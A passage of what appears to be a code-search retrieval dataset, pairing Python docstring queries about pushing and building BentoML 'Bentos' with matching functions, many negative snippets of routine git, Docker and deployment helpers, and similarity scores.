"def fetch(self):\n if self.host.filesystem.exists(self.path):\n _log.info('WPT checkout exists at %s, fetching latest', self.path)\n self.run(['git', 'fetch', 'origin'])\n self.run(['git', 'reset', '--hard', 'origin/master'])\n return\n\n _log.info('Cloning GitHub web-platform-tests/wpt into %s', self.path)\n if self.gh_token:\n remote_url = WPT_GH_SSH_URL_TEMPLATE.format(self.gh_token)\n else:\n remote_url = WPT_MIRROR_URL\n _log.info('No credentials given, using wpt mirror URL.')\n _log.info(\n 'It is possible for the mirror to be delayed; see https://crbug.com/698272.'\n )\n # Do not use self.run here because self.path doesn't exist yet.\n self.host.executive.run_command(\n ['git', 'clone', remote_url, self.path])\n\n _log.info('Setting git user name & email in %s', self.path)\n self.run(['git', 'config', 'user.name', DEFAULT_WPT_COMMITTER_NAME])\n self.run(['git', 'config', 'user.email', DEFAULT_WPT_COMMITTER_EMAIL])",
"def __init__(self):\n self.api = TodoistAPI(API_KEY)\n self.api.sync()",
"def shift_server():\n global ALIVE\n if ALIVE == 0:\n ALIVE = 1\n elif ALIVE == 1:\n ALIVE = 0\n channel = grpc.insecure_channel(PORTS[ALIVE])\n stub = dist_bank_pb2_grpc.DistBankStub(channel)\n return stub",
"def pull(browser):\n fetched = 0\n table = browser.get_template_table()\n\n print('Checking all letters for changes...')\n for letter in table.rows:\n letter.console_msg()\n if letter.remote_modified():\n old_chk = letter.checksum\n letter.pull()\n if old_chk is None:\n letter.console_msg('fetched new letter @ {}'.format(letter.checksum[0:7]))\n else:\n letter.console_msg('updated from {} to {}'.format(old_chk[0:7], letter.checksum[0:7]))\n fetched += 1\n else:\n letter.console_msg('no changes')\n\n sys.stdout.write('\\n')\n\n sys.stdout.write(Fore.GREEN + '{} of {} files contained new modifications\\n'.format(fetched, len(table.rows)) + Style.RESET_ALL)\n\n # status['last_pull_date'] = datetime.now()\n table.status.save()",
"def PullTasmotaConfig(host, port, username=DEFAULTS['source']['username'], password=None):\n _, body = TasmotaGet('dl', host, port, username, password, contenttype='application/octet-stream')\n\n return body",
"def _load(self):\n\n context = {\n \"username\": self.username,\n \"reponame\": self.reponame,\n \"name\": self.name\n }\n LOG.debug(\"Loading %s\" % self.branch_id)\n doc = self._client.getjson(path=\"/users/%(username)s/repos/%(reponame)s\"\n \"/branches/%(name)s\" % context)\n LOG.debug(\"doc loaded: %r\" % doc)\n slice_id = \"%(username)s/%(reponame)s/%(slice_id)s\" % {\n \"username\": self.username,\n \"reponame\": self.reponame,\n \"slice_id\": doc[\"slice_id\"]\n }\n self._slice = self._client.slice(slice_id)\n self._packages = doc[\"packages\"]",
"def git_pull():\n\n puts(yellow(\"Pull master from GitHub\"))\n with cd(env.source_dir):\n run('git reset --hard HEAD')\n run('git pull')",
"def test_get_boat(self):\n pass",
"def __fetch_remote_source(self):\n # type: () -> Union(Git, None)\n if self.source == 'git':\n return self.git_source_class(**self.configuration).fetch()\n return None",
"def pull(release):\n image = f\"breqwatr/rsyslog:{release}\"\n ecr.pull(image)"
] | [
"0.6253494",
"0.61232203",
"0.59411526",
"0.5814772",
"0.5765839",
"0.5646557",
"0.55963373",
"0.55957717",
"0.5572075",
"0.55645216",
"0.5557959",
"0.5454153",
"0.5417521",
"0.54132676",
"0.5413063",
"0.53649527",
"0.5361535",
"0.5349794",
"0.53326946",
"0.53325665",
"0.5319298",
"0.53111213",
"0.5273583",
"0.5221559",
"0.52046984",
"0.51962155",
"0.5192047",
"0.51849926",
"0.5144103",
"0.5126676",
"0.510129",
"0.5048991",
"0.50451934",
"0.5041838",
"0.50309366",
"0.501729",
"0.5013243",
"0.50073",
"0.49940103",
"0.49790677",
"0.49786046",
"0.49713257",
"0.49710426",
"0.49695373",
"0.49151093",
"0.49012133",
"0.48977458",
"0.4878724",
"0.48607787",
"0.4832093",
"0.4826335",
"0.48230666",
"0.4813698",
"0.47944596",
"0.47944596",
"0.47943652",
"0.47922963",
"0.4780897",
"0.47609752",
"0.47556618",
"0.4743114",
"0.4741002",
"0.47119883",
"0.47073004",
"0.47027755",
"0.46979165",
"0.46957064",
"0.4687686",
"0.46816927",
"0.4678992",
"0.46723768",
"0.46672088",
"0.46574214",
"0.46569642",
"0.46569583",
"0.4645533",
"0.46416372",
"0.46413764",
"0.46396995",
"0.4630324",
"0.46250108",
"0.46210063",
"0.46183068",
"0.46181923",
"0.46171457",
"0.46161777",
"0.4615168",
"0.46140647",
"0.46134996",
"0.4602909",
"0.45954016",
"0.45929688",
"0.45786077",
"0.4576626",
"0.45751002",
"0.45744494",
"0.4573463",
"0.45540816",
"0.45534822",
"0.45419338"
] | 0.72192776 | 0 |
Push Bento to a yatai server. | def push(bento_tag: str, force: bool, threads: int) -> None: # type: ignore (not accessed)
bento_obj = bento_store.get(bento_tag)
if not bento_obj:
raise click.ClickException(f"Bento {bento_tag} not found in local store")
yatai_client.push_bento(bento_obj, force=force, threads=threads) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def _push_to_server(self) -> None:\n pass",
"def push(self, *args, **kwargs):\n pass",
"def push(self, obj):\n pass",
"def remote_push(self, pNamespace):",
"def push(self):\n origin = self.git_repo.remotes.origin\n origin.push()",
"def _push(self):\n push_cmds = self.vcs.push_commands()\n if not push_cmds:\n return\n if utils.ask(\"OK to push commits to the server?\"):\n for push_cmd in push_cmds:\n output = execute_command(push_cmd)\n logger.info(output)",
"def push(self):\n out, err, code = self.command( [\"git\", \"push\"], self.directory )",
"def push(self, obj):\r\n request = http.Request('POST', self.get_push_url(), obj)\r\n return request, parsers.parse_json",
"def push():\n branch = git.current_branch().name\n shell.run('git push -u origin {}'.format(branch))",
"def push():\n local('hg push jvacx')",
"def push_data(self, data):\n self.incoming.write(data)",
"def push(ctx):\n dufl_root = ctx.obj['dufl_root']\n git = Git(ctx.obj.get('git', '/usr/bin/git'), dufl_root)\n git.run('push', 'origin', git.working_branch())",
"def to_server(self, o):\n assert type(o) == str\n\n # add to queue\n self.toserverqueue.put(o, block=False)\n\n # send now, if appropriate\n if self.buffer_tx==False:\n self.periodicTimer.fireNow()",
"def push(self):\n return False",
"def push(self, remote, branch, *args):\n return self.cmd('push', remote, branch, *args)",
"def push(self, command):\n \n if len(command) > 1: \n if p.location == a.location:\n for item in p.location.objects:\n if command[1] == item.name:\n item.location.objects.remove(a)\n item.location = seven \n seven.objects.append(a)\n print('You pushed ' + item.name + '!')\n else:\n print(\"Push who?\")",
"def push(self):\n if self.forward:\n git = self.repo.git\n try:\n git.push()\n self.forward = \"pushed\"\n except:\n self.forward = \"push error - \"+self.forward",
"def __gitPush(self):\n self.vcs.gitPush(self.project.getProjectPath())",
"def push(self, item: Any) -> None:\n # TODO: Implement this method\n ...",
"def push_write(self, s):\n ...",
"def push ():\n\n tagname = get_tag (comp_versions, 'ACE')\n\n if opts.push:\n if opts.take_action:\n vprint (\"Pushing ACE_TAO\", opts.ace_tao_branch, \"to origin\")\n ex (\"cd $DOC_ROOT/ACE_TAO && git push origin \" + opts.ace_tao_branch)\n\n vprint (\"Pushing tag %s on ACE_TAO\" % (tagname))\n ex (\"cd $DOC_ROOT/ACE_TAO && git push origin tag \" + tagname)\n\n vprint (\"Pushing tag %s on MPC\" % (tagname))\n ex (\"cd $DOC_ROOT/MPC && git push origin tag \" + tagname)\n\n # Push release branches\n latest_branch_helper (push_latest_branch, opts.release_type)\n else:\n vprint (\"Pushing tag %s on ACE_TAO\" % (tagname))\n vprint (\"Pushing tag %s on MPC\" % (tagname))\n print (\"Pushing tags:\\n\")\n print (\"Pushing tag \" + tagname + \"\\n\")",
"def push(self, **kwargs):\n return _taskpipeoperation(self,'push', **kwargs)",
"def push(self, x):\n self.queue[self.tag].put(x)",
"def push(self):\n self.stack.append(self.save())",
"def push(self, item):\n pass",
"def push(self, *args, **kwargs):\n self.queue.put((args, kwargs))",
"def push_commits(self, verbose=True):\n # The subprocess will return a non-zero exit code even if it succeeded.\n # Check its output to determine whether it worked.\n push_proc = subprocess.run(\n [\"git\", \"push\"],\n cwd=self.path,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True,\n )\n if \"updated in conservator\" not in push_proc.stdout:\n if \"Everything up-to-date\" in push_proc.stdout:\n logger.warning(push_proc.stdout)\n else:\n logger.error(\n \"Server did not accept changes to index.json:\\n%s\", push_proc.stdout\n )\n raise RuntimeError(\"Failed to push changes to index.json\")\n self.pull(verbose)",
"def d_ploy():\n\tlocal(\"git push origin --all\")\n\twith cd(LIVE_ROOT):\n\t\trun(\"git pull\")",
"def post(self):\n text = 'HELLO from socnet API Server!'\n return push_to_mattermost(text)",
"def push(args):\n if args.type == 'ssh':\n cache = set(args.remote_cache).union(set(args.cache))\n for path in sorted(cache):\n if os.path.exists(os.path.join(args.base, path)) and not remote_exists(args.sftp, os.path.join(args.remote_base, path)):\n print('push: {}'.format(path))\n ensure_remote(args.sftp, os.path.dirname(os.path.join(args.remote_base, path)))\n args.sftp.put(\n os.path.join(args.base, path),\n os.path.join(args.remote_base, path)\n )\n args.remote_cache.append(path)\n args.remote_update = True\n elif args.type == 's3':\n raise NotImplementedError('s3:// remote type not yet supported!')\n elif args.type == 'gs':\n raise NotImplementedError('gs:// remote type not yet supported!')\n return",
"def push(self, request):\n serializer = PushTestSerializer(data=request.data, context={'request': request})\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response({'success': True}, status=status.HTTP_201_CREATED)",
"def push(self):\n data = {self._build_key(key): value for key, value in self.motions.items()}\n DataManager.control.update(data)",
"def push(targets, **namespace):",
"def push(self, data):\n node = OneWayNode(data)\n self.__head = node\n node.set_next(self.__head)\n self.__size += 1",
"def push(self, x):\r\n self.queue.append(x)\r\n self.topele = x\r\n self.num+=1",
"def push(keys: List[str]):\n api = API()\n api.push(*keys)",
"def infocalypse_push(ui_, repo, **opts):\n params, stored_cfg = get_config_info(ui_, opts)\n insert_uri = opts['uri']\n if insert_uri == '':\n insert_uri = stored_cfg.get_dir_insert_uri(repo.root)\n if not insert_uri:\n ui_.warn(\"There is no stored insert URI for this repo.\\n\"\n \"Please set one with the --uri option.\\n\")\n return\n\n set_target_version(ui_, repo, opts, params,\n \"Only pushing to version(s): %s\\n\")\n params['INSERT_URI'] = insert_uri\n #if opts['requesturi'] != '':\n # # DOESN'T search the insert uri index.\n # ui_.status((\"Copying from:\\n%s\\nTo:\\n%s\\n\\nThis is an \"\n # + \"advanced feature. \"\n # + \"I hope you know what you're doing.\\n\") %\n # (opts['requesturi'], insert_uri))\n # params['REQUEST_URI'] = opts['requesturi']\n\n execute_push(ui_, repo, params, stored_cfg)",
"def push(self, x):\r\n self.queue.append(x)",
"def _push(self, server):\n defns = [self.get_id(ident) for ident in list(self.ids)]\n #for ident in list(self.ids):\n # defn = self.get_id(ident)\n if len(defns) == 0:\n return\n self.app.logger.info(f\"Updating {server} with {len(defns)} records\")\n url = f\"{server}/add_record\"\n try:\n resp = requests.post(url, json=defns)\n except Exception as e:\n self.app.logger.error(str(e))\n return\n if not resp.ok:\n self.app.logger.error(f\"{resp.reason} {resp.content}\")\n return\n self._server_updated[server] = True",
"def dispatch_push(self, p, tweaks, badge):\n pass",
"async def fancysay(self, ctx):",
"def push(self, value):\n self.history.append(value)",
"def sendBuffer():\n dislin.sendbf()",
"def ship():\n cotton.git_push()\n cotton.install_python_dependencies()\n\n # Deploy the secrets module to the remote project root\n spath = os.path.abspath(os.path.join(os.path.dirname(__file__), '..', 'secrets'))\n put(spath, env.project_root)\n\n cotton.upload_template_and_reload('cron')",
"def push(self, x):\n self.queue.insert(0, x)",
"def push(self, x):\n self.queue.insert(0, x)",
"def push(self, item: T) -> None:\n pass",
"def push(self) -> None:\n\n with ImportExtensions(required=True):\n import requests\n\n pkg_path = Path(self.args.path)\n if not pkg_path.exists():\n self.logger.critical(f'`{self.args.path}` is not a valid path!')\n exit(1)\n\n request_headers = self._get_request_header()\n\n try:\n # archive the executor package\n with TimeContext(f'Packaging {self.args.path}', self.logger):\n md5_hash = hashlib.md5()\n bytesio = archive_package(pkg_path)\n content = bytesio.getvalue()\n md5_hash.update(content)\n\n md5_digest = md5_hash.hexdigest()\n\n # upload the archived package\n form_data = {\n 'public': self.args.public if hasattr(self.args, 'public') else False,\n 'private': self.args.private\n if hasattr(self.args, 'private')\n else False,\n 'md5sum': md5_digest,\n 'force': self.args.force,\n 'secret': self.args.secret,\n }\n\n method = 'put' if self.args.force else 'post'\n\n hubble_url = get_hubble_url()\n # upload the archived executor to Jina Hub\n with TimeContext(\n f'Pushing to {hubble_url} ({method.upper()})',\n self.logger,\n ):\n resp = getattr(requests, method)(\n hubble_url,\n files={'file': content},\n data=form_data,\n headers=request_headers,\n )\n\n if 200 <= resp.status_code < 300:\n # TODO: only support single executor now\n image = resp.json()['executors'][0]\n\n uuid8 = image['id']\n secret = image['secret']\n visibility = image['visibility']\n\n info_table = [\n f'\\t🔑 ID:\\t\\t' + colored(f'{uuid8}', 'cyan'),\n f'\\t🔒 Secret:\\t'\n + colored(\n f'{secret}',\n 'cyan',\n )\n + colored(\n ' (👈 Please store this secret carefully, it wont show up again)',\n 'red',\n ),\n f'\\t👀 Visibility:\\t' + colored(f'{visibility}', 'cyan'),\n ]\n\n if 'alias' in image:\n info_table.append(f'\\t📛 Alias:\\t' + colored(image['alias'], 'cyan'))\n\n self.logger.success(f'🎉 Executor `{pkg_path}` is pushed successfully!')\n self.logger.info('\\n' + '\\n'.join(info_table))\n\n usage = (\n f'jinahub://{uuid8}'\n if visibility == 'public'\n else f'jinahub://{uuid8}:{secret}'\n )\n\n self.logger.info(f'You can use it via `uses={usage}` in the Flow/CLI.')\n elif resp.text:\n # NOTE: sometimes resp.text returns empty\n raise Exception(resp.text)\n else:\n resp.raise_for_status()\n except Exception as e: # IO related errors\n self.logger.error(\n f'Error while pushing `{self.args.path}` with session_id={request_headers[\"jinameta-session-id\"]}: '\n f'\\n{e!r}'\n )",
"def event_player_push(self) -> None:\n print(f\"You got a push, your bet of {self.user.bet} is returned\")",
"def on_push(self, data):\n if data[\"type\"] == \"push\":\n self._data = data[\"push\"]",
"def add(self, bento_name, bento_version):",
"def push(self, x):\n self.mystack1.append(x)\n # print(self.mystack1)",
"def push(self, item):\n self._pushed.append(item)",
"def push(self, value: object) -> None:\n self._data.append(value)",
"def push(self, value: object) -> None:\n self._data.append(value)",
"def _push_from_buffer(self):\r\n if len(self.buffer) > 0:\r\n if time.time() - self.last_sent_time > 5:\r\n try:\r\n message = self.buffer.pop(0)\r\n self._send_now(message)\r\n finally:\r\n self.last_sent_time = time.time()",
"def push(self):\n result = self.get_result_dict()\n headers = {\n 'Authorization': self.token\n }\n response = requests.post(\n url, json=json.dumps(result, indent=4), headers=headers\n )\n return response.json()",
"def call_git_push():\n print(\"This will commit and push the git repo\")\n today = datetime.datetime.today()\n call([\"git\", \"add\", \".\"])\n call([\"git\", \"commit\", \"-m\", \"Updated notes. {:%Y-%m-%d %H:%M:%S}\".format(today)])\n call([\"git\", \"push\", \"origin\", \"master\"])",
"def push(self, x):",
"def push(self, x):\n self.queue.insert(len(self.queue), x)",
"def _got_remote(self, data):\n self._recv_buffer += data",
"def push(self, x):\r\n # 队列的push操作\r\n self.stack.append(x)",
"def push_updates():\n check_call(['git', 'push', '--tags', '--force'])",
"def send_message_to_server(self, key, value):\n if self.from_kivy_queue is None:\n return\n self.from_kivy_queue.put((key, value))",
"def push(event):\n _pushedEvents.append(event)",
"def send_message_to_server(self, new_element):\n self._current_list.append(new_element)\n print(\"Enviando... {}\".format(self._current_list))\n final_content = dumps(self._current_list)\n self._socket.send(final_content)",
"def push(self, data):\n self._list.append(data)",
"def push(images, tag, registry):\n manager = Manager('push', tag, images=images, registry_url=registry)\n manager.run()",
"def do_push(self, remote, branch, force=False, force_with_lease=False, remote_branch=None):\n if self.savvy_settings.get(\"confirm_force_push\", True):\n if force:\n if not sublime.ok_cancel_dialog(CONFIRM_FORCE_PUSH.format(\"--force\")):\n return\n elif force_with_lease:\n if not sublime.ok_cancel_dialog(CONFIRM_FORCE_PUSH.format(\"--force--with-lease\")):\n return\n\n self.window.status_message(START_PUSH_MESSAGE)\n self.push(\n remote,\n branch,\n set_upstream=self.set_upstream,\n force=force,\n force_with_lease=force_with_lease,\n remote_branch=remote_branch\n )\n self.window.status_message(END_PUSH_MESSAGE)\n util.view.refresh_gitsavvy(self.window.active_view())",
"def push(self, x):\n self.queue1.append(x)",
"def push(self, base_repo, branch=\"master\"):\n base_repo.push_to(self, branch)",
"def transmit_to_server(self):\n # If a server argument was not given then exit the program\n self.channel.basic_publish(exchange='', routing_key='bt_wardrive', body=self.capture,\n properties=pika.BasicProperties(delivery_mode=2))",
"def push_updates(update_alias, config, path_or_url):\n api = get_packit_api(config=config, local_project=path_or_url)\n api.push_updates(update_alias)",
"def deploy():\n build()\n collect()\n commit()\n push()",
"def push(repo_host, user='debrepo', verbose=False):\n # input stream: deb file paths\n # convert this to cpio stream\n cpio=Popen(['/bin/cpio', '-o'], stdout=PIPE)\n\n # push to the other end\n user_host='{user}@{repo_host}'.format(user=user, repo_host=repo_host)\n cmd=['/usr/bin/ssh', user_host, 'debhelper.py', 'receive']\n if verbose:\n print(' '.join(cmd))\n\n push=Popen(cmd, stdin=cpio.stdout)\n\n sys.exit(push.wait())",
"def push(host):\n dispatcher = Dispatch(host)\n\n post(host)\n\n context = zmq.Context()\n zmq_socket = context.socket(zmq.PUSH)\n zmq_socket.bind('tcp://127.0.0.1:5560')\n\n for record in dispatcher:\n zmq_socket.send_pyobj((int(time.time()),record.raw))",
"def do_push(self, line):\n self.review.push()\n return True",
"def callback(address, queue, data):\n queue.put(bytes('ACK', 'utf8'))\n self._server_in_buf.append(data)",
"def git_push(c):\n c.run(\"git submodule foreach git push \")",
"def callback(address, queue, data):\n\t\t\tqueue.put(bytes('ACK', 'utf8'))\n\t\t\tself._server_in_buf.append(data)",
"def do_push( sliver_hosts, portnum, payload ):\n \n global TESTING, CONFIG\n \n from gevent import monkey\n \n if TESTING:\n monkey.patch_all()\n \n else:\n # make gevents runnabale from multiple threads (or Django will complain)\n monkey.patch_all(socket=True, dns=True, time=True, select=True, thread=False, os=True, ssl=True, httplib=False, aggressive=True)\n \n import grequests\n \n # fan-out \n requests = []\n for sh in sliver_hosts:\n rs = grequests.post( \"http://\" + sh + \":\" + str(portnum), data={\"observer_message\": payload}, timeout=getattr(CONFIG, \"SYNDICATE_HTTP_PUSH_TIMEOUT\", 60) )\n requests.append( rs )\n \n # fan-in\n responses = grequests.map( requests )\n \n assert len(responses) == len(requests), \"grequests error: len(responses) != len(requests)\"\n \n for i in xrange(0,len(requests)):\n resp = responses[i]\n req = requests[i]\n \n if resp is None:\n logger.error(\"Failed to connect to %s\" % (req.url))\n continue \n \n # verify they all worked \n if resp.status_code != 200:\n logger.error(\"Failed to POST to %s, status code = %s\" % (resp.url, resp.status_code))\n continue\n \n return True",
"def push(self, item: Any) -> None:\n self._data.append(item)",
"def pushAll(**namespace):",
"def push(self, value):\n raise NotImplementedError",
"def push(self):\n self.runtime.logger.info('Pushing config...')\n with Dir(self.runtime.metadata_dir):\n exectools.cmd_assert([\"git\", \"push\"])",
"def _push_to_server(self) -> None:\n if not self.url or not self.job_name:\n return\n\n try:\n pushadd_to_gateway(self.url, job=self.job_name, registry=REGISTRY, handler=self._auth_handler)\n\n except OSError as exp:\n self.logger.warning(\"Failed to push metrics to %s: %s\", self.url, str(exp))\n except:\n self.logger.exception(\"Failed to push metrics to %s\", self.url)\n\n self.logger.debug(\"Pushed metrics to %s\", self.url)",
"def push(target):\n if target is None:\n target = getcwd()\n\n target = path.abspath(target)\n\n dot_chunk = load_chunk(target)\n src = dot_chunk[\"src\"]\n source = load_source(src)\n\n copy(target, source)",
"def syncpush(repo, remote):\n if (_enabled and repo.obsstore and\n 'obsolete' in remote.listkeys('namespaces')):\n rslts = []\n remotedata = repo.listkeys('obsolete')\n for key in sorted(remotedata, reverse=True):\n # reverse sort to ensure we end with dump0\n data = remotedata[key]\n rslts.append(remote.pushkey('obsolete', key, '', data))\n if [r for r in rslts if not r]:\n msg = _('failed to push some obsolete markers!\\n')\n repo.ui.warn(msg)",
"def push(self, points, database):\n params = urllib.urlencode(\n {'db': database, 'u': self.user, 'p': self.password, 'precision': 's'}\n )\n\n stamp = int(time.time())\n for point in points:\n if not point.time:\n point.time = stamp\n\n while points:\n body = '\\n'.join(p.serialize() for p in points[:100])\n points = points[100:]\n for attempt in range(5):\n if attempt:\n time.sleep(2 ** (attempt - 1))\n\n try:\n conn = httplib.HTTPConnection(self.host_port)\n conn.request('POST', '%s/write?%s' % (self.path, params), body)\n resp = conn.getresponse()\n except httplib.HTTPException:\n print >>sys.stderr, (\n 'Exception POSTing influx points to: %s\\n%s'\n % (self.host_port, traceback.format_exc())\n )\n continue\n if resp.status >= 500:\n continue\n if resp.status >= 400:\n raise Error(\n 'Error writing InfluxDB points (attempt #%d, status code %d): %s'\n % (attempt, resp.status, resp.read())\n )\n break\n else:\n raise Error(\n 'Failed to write InfluxDB points with %d attempts. (status code %d): %s'\n % (attempt, resp.status, resp.read())\n )",
"def pull(bento_tag: str, force: bool) -> None: # type: ignore (not accessed)\n yatai_client.pull_bento(bento_tag, force=force)",
"def push_application(self):\n raise NotImplementedError()",
"def send(self, repo_id, action, *args):\n self.queue.put({'repo_id': repo_id, 'action': action, 'data': args})\n self.callback(repo_id, action, *args)",
"def make_push(db,product_name, date, product_number, product_price, url):\n if db.product_mstator.find({'url':url}).count()==0:\n push = {\n \"product_name\": product_name,\n \"date\": [date],\n 'product_number': [product_number],\n 'product_price': [product_price],\n 'url': url\n }\n db.product_mstator.insert_one(push)\n else:\n db.product_mstator.update_one({'url':url},{'$push': {\n 'date':date,\n 'product_number':product_number,\n 'product_price':product_price\n }})\n return None",
"def push(self, data):\r\n return bass_call_0(BASS_StreamPutData, self.handle, data, len(data))",
"def push(self, item) -> None:\n self.items.append(item)",
"def push_queue(self, url):\n self.sqs_client.send_message(\n QueueUrl=self.sqs_queue,\n MessageBody=url,\n )",
"async def addtags(self, ctx, tag, *, data):\r\n\t\tTag = self.settings.ServerConfig(ctx.guild.id, 'Tags')\r\n\t\tif not tag in Tag:\r\n\t\t\tTag[tag] = self.Conf.Tags\r\n\t\t\tawait ctx.send('Added Tag: {}'.format(tag))\r\n\t\telse:\r\n\t\t\tawait ctx.send('Edited Tag: '.format(tag))\r\n\r\n\t\tnowgmt = time.strftime(\"%H:%M:%S, %d/%m/%Y\", time.gmtime())\r\n\t\t\r\n\t\tTag[tag]['user'] = ctx.author.id\r\n\t\tTag[tag]['data'] = data\r\n\t\tTag[tag]['time'] = nowgmt\r\n\t\tself.settings.ServerConfig(ctx.guild.id, 'Tags', Tag)",
"def push(self, x: int) -> None:\n self.data.push(x)",
"def docker_push(c):\n cli_tasks.docker_push.run(c)",
"def command_insert(self, a_command):\n \n # Use the command to send a GCM.\n gcm = GCM(API_KEY)\n response = gcm.json_request(registration_ids=REGISTRATION_IDS, data={'data': a_command})\n a_command.gcm_response = response\n \n a_command.put()\n return a_command"
] | [
"0.71998096",
"0.6480765",
"0.5861547",
"0.5851244",
"0.5771112",
"0.575511",
"0.5752704",
"0.57498515",
"0.568986",
"0.564071",
"0.56019354",
"0.5566268",
"0.5532686",
"0.5483675",
"0.54428613",
"0.542945",
"0.5403216",
"0.5375344",
"0.5329458",
"0.53241456",
"0.53143793",
"0.53034",
"0.5295266",
"0.52948445",
"0.5287468",
"0.5282802",
"0.52817434",
"0.52816194",
"0.52518886",
"0.52261347",
"0.52087975",
"0.5185521",
"0.51756185",
"0.51755214",
"0.51596874",
"0.5136779",
"0.51322365",
"0.51246077",
"0.51015234",
"0.510047",
"0.5097144",
"0.5095989",
"0.5088798",
"0.507358",
"0.50619745",
"0.50619745",
"0.50573355",
"0.5052031",
"0.5050427",
"0.5048329",
"0.5034402",
"0.5029425",
"0.5026796",
"0.50165635",
"0.50165635",
"0.5008754",
"0.5005434",
"0.49923885",
"0.49895847",
"0.4986887",
"0.49835807",
"0.49797964",
"0.49784303",
"0.49671394",
"0.49593547",
"0.49526995",
"0.49510062",
"0.4948335",
"0.49474564",
"0.49453437",
"0.4944745",
"0.49333584",
"0.4926325",
"0.4926219",
"0.49210805",
"0.49105445",
"0.49051163",
"0.48965386",
"0.4893434",
"0.4886455",
"0.4874453",
"0.4873474",
"0.4871798",
"0.48649544",
"0.48563847",
"0.48506352",
"0.4844202",
"0.48288995",
"0.48200965",
"0.48153389",
"0.4814049",
"0.48122308",
"0.48090312",
"0.4800188",
"0.47984445",
"0.4792178",
"0.47912428",
"0.4791215",
"0.47905847",
"0.4789722"
] | 0.70428616 | 1 |
Build a new Bento from current directory. | def build(build_ctx: str, bentofile: str, version: str) -> None: # type: ignore (not accessed)
if sys.path[0] != build_ctx:
sys.path.insert(0, build_ctx)
build_bentofile(bentofile, build_ctx=build_ctx, version=version) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def build(root):",
"def build():",
"def makeProject(self, version, baseDirectory=None):\n if baseDirectory is None:\n baseDirectory = FilePath(self.mktemp())\n baseDirectory.createDirectory()\n segments = version.package.split('.')\n directory = baseDirectory\n for segment in segments:\n directory = directory.child(segment)\n if not directory.exists():\n directory.createDirectory()\n directory.child('__init__.py').setContent('')\n directory.child('topfiles').createDirectory()\n directory.child('topfiles').child('README').setContent(version.base())\n replaceProjectVersion(\n directory.child('_version.py').path, version)\n return Project(directory)",
"def _create_checkout(self):\n parent_git_dir = os.path.join(self._parent_repo, self._run_git_command(\n ['rev-parse', '--git-dir']).strip())\n self._workdir = tempfile.mkdtemp(prefix='drover_%s_' % self._branch)\n logging.debug('Creating checkout in %s', self._workdir)\n git_dir = os.path.join(self._workdir, '.git')\n git_common.make_workdir_common(parent_git_dir, git_dir, self.FILES_TO_LINK,\n self.FILES_TO_COPY, mk_symlink)\n self._run_git_command(['config', 'core.sparsecheckout', 'true'])\n with open(os.path.join(git_dir, 'info', 'sparse-checkout'), 'w') as f:\n f.write('/codereview.settings')\n\n branch_name = os.path.split(self._workdir)[-1]\n self._run_git_command(['checkout', '-b', branch_name, self._branch_ref])\n self._branch_name = branch_name",
"def makeProject(self, version, baseDirectory=None):\n if baseDirectory is None:\n baseDirectory = FilePath(self.mktemp())\n segments = version[0].split(\".\")\n directory = baseDirectory\n for segment in segments:\n directory = directory.child(segment)\n if not directory.exists():\n directory.createDirectory()\n directory.child(\"__init__.py\").setContent(b\"\")\n directory.child(\"newsfragments\").createDirectory()\n directory.child(\"_version.py\").setContent(genVersion(*version).encode())\n return Project(directory)",
"def __init__(self, root_dir, relpath, must_exist=True):\r\n\r\n path = os.path.abspath(os.path.join(root_dir, relpath))\r\n buildfile = os.path.join(path, BuildFile._CANONICAL_NAME) if os.path.isdir(path) else path\r\n\r\n if os.path.isdir(buildfile):\r\n raise IOError(\"%s is a directory\" % buildfile)\r\n\r\n if must_exist:\r\n if not os.path.exists(buildfile):\r\n raise IOError(\"BUILD file does not exist at: %s\" % buildfile)\r\n\r\n if not BuildFile._is_buildfile_name(os.path.basename(buildfile)):\r\n raise IOError(\"%s is not a BUILD file\" % buildfile)\r\n\r\n if not os.path.exists(buildfile):\r\n raise IOError(\"BUILD file does not exist at: %s\" % buildfile)\r\n\r\n self.root_dir = os.path.realpath(root_dir)\r\n self.full_path = os.path.realpath(buildfile)\r\n\r\n self.name = os.path.basename(self.full_path)\r\n self.parent_path = os.path.dirname(self.full_path)\r\n\r\n self._bytecode_path = os.path.join(self.parent_path, '.%s.%s.pyc' % (\r\n self.name, PythonIdentity.get()))\r\n\r\n self.relpath = os.path.relpath(self.full_path, self.root_dir)\r\n self.canonical_relpath = os.path.join(os.path.dirname(self.relpath), BuildFile._CANONICAL_NAME)",
"def bundle(self):\n\n try:\n self.build_directory.mkdir(parents=True)\n except FileExistsError:\n logger.warning('Directory already exists: %s', self.build_directory)\n decision = input(\n f'{self.build_directory} already exists. Overwrite? Y/[N]: '\n )\n if decision.strip().upper() == 'Y':\n logger.info('Deleting old build directory: %s', self.build_directory)\n shutil.rmtree(self.build_directory)\n self.build_directory.mkdir(parents=True)\n else:\n return\n\n with cd(self.app_directory):\n self._install_dependencies()\n self._handle_supplemental_data()\n self._cleanup_files()\n if self.make_zip:\n self._zip_files()",
"def temp(cls, basedir=None):\r\n context = cls(BuildFile(get_buildroot(), basedir or 'BUILD.temp', must_exist=False))\r\n with cls.activate(context):\r\n yield",
"def build(config):",
"def build(_):",
"def create(self):\n if os.path.isdir(self.repodir):\n if os.listdir(self.repodir):\n raise EmtError('%s is not empty' % self.repodir)\n else:\n os.makedirs(self.repodir)\n self.git_cmd('init')\n self.initialized = True",
"def build(target_dir):\n prepare_demo_site(target_dir)\n\n patch_config(\n target_dir, (\"# CREATE_FULL_ARCHIVES = False\", \"CREATE_FULL_ARCHIVES = True\")\n )\n\n with cd(target_dir):\n __main__.main([\"build\"])",
"def move_files_into_build():\n build_root = os.path.join(template_path, 'build')\n create_python_package(build_root)\n\n build_buildbot = os.path.join(template_path, 'build', 'buildbot')\n create_python_package(build_buildbot)\n\n pythonify('runtests', [], ['build']) \n pythonify('master.cfg', ['buildbot'], ['build', 'buildbot'])",
"def build(working_directory=None, args=None):\n from .buildme import main\n if args is None:\n args = []\n return main(working_directory, args)",
"def Build(self, out_file):\n raise NotImplementedError",
"def clone(self):\n out, err, code = self.command( [\"git\", \"clone\", self.repo] )\n\n # find the directory into which the\n self.directory = self.path\n for path in os.listdir(self.path):\n self.directory = os.path.join(self.path,path)\n break",
